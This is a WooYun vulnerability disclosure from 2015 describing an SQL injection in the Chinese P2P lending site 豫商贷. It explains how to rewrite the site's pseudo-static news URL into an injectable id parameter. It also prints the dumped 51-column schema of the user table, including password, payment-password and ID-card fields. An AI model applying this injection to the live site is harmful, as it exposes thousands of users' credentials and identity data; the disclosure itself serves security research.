当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114051

漏洞标题:豫商贷P2P金融平台SQL注入一枚可导致用户信息泄漏(伪静态重构突破)

相关厂商:豫商贷

漏洞作者: anting

提交时间:2015-05-14 16:19

修复时间:2015-06-28 16:20

公开时间:2015-06-28 16:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一次浅尝辄止的测试

详细说明:

这是一个伪静态https://www.zzwms.com/news/info/id/5134.html
然后重新构造以下https://www.zzwms.com/news/info?id=5134或者直接加个*也行
内容相当多,用户名密码,wangwang,支付密码,由于只是测试,只是简单的看了下部分用户名(总用户10132)

漏洞证明:

11.PNG

12.PNG


Database: zzwms
Table: dw_user
[51 columns]
+-----------------+------------------+
| Column | Type |
+-----------------+------------------+
| order | int(11) |
| AccountNumber | varchar(10) |
| addip | varchar(50) |
| address | varchar(200) |
| addtime | varchar(50) |
| answer | varchar(100) |
| area | varchar(20) |
| Authorize | varchar(10) |
| avatar_status | int(2) |
| birthday | varchar(11) |
| card_id | varchar(50) |
| card_pic1 | varchar(150) |
| card_pic2 | varchar(150) |
| card_type | varchar(10) |
| city | varchar(20) |
| email | varchar(30) |
| email_status | varchar(50) |
| integral | varchar(10) |
| invite_money | varchar(10) |
| invite_userid | varchar(11) |
| islock | int(2) |
| lastip | varchar(20) |
| lasttime | varchar(50) |
| litpic | varchar(250) |
| Loanaddtime | varchar(50) |
| logintime | int(11) |
| MoneymoremoreId | varchar(10) |
| nation | varchar(10) |
| password | varchar(50) |
| paypassword | varchar(50) |
| phone | varchar(50) |
| phone_status | varchar(50) |
| privacy | text |
| province | varchar(20) |
| purview | varchar(100) |
| qq | varchar(50) |
| question | varchar(10) |
| real_status | varchar(2) |
| realname | varchar(20) |
| remind | text |
| scene_status | int(2) |
| sex | varchar(10) |
| status | int(2) |
| tel | varchar(50) |
| type_id | int(11) |
| upip | varchar(50) |
| uptime | varchar(50) |
| user_id | int(10) unsigned |
| username | varchar(30) |
| video_status | int(2) |
| wangwang | varchar(100) |
+-----------------+------------------+

12.PNG

13.PNG

修复方案:

安全很重要,欢迎来到乌云啊

版权声明:转载请注明来源 anting@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)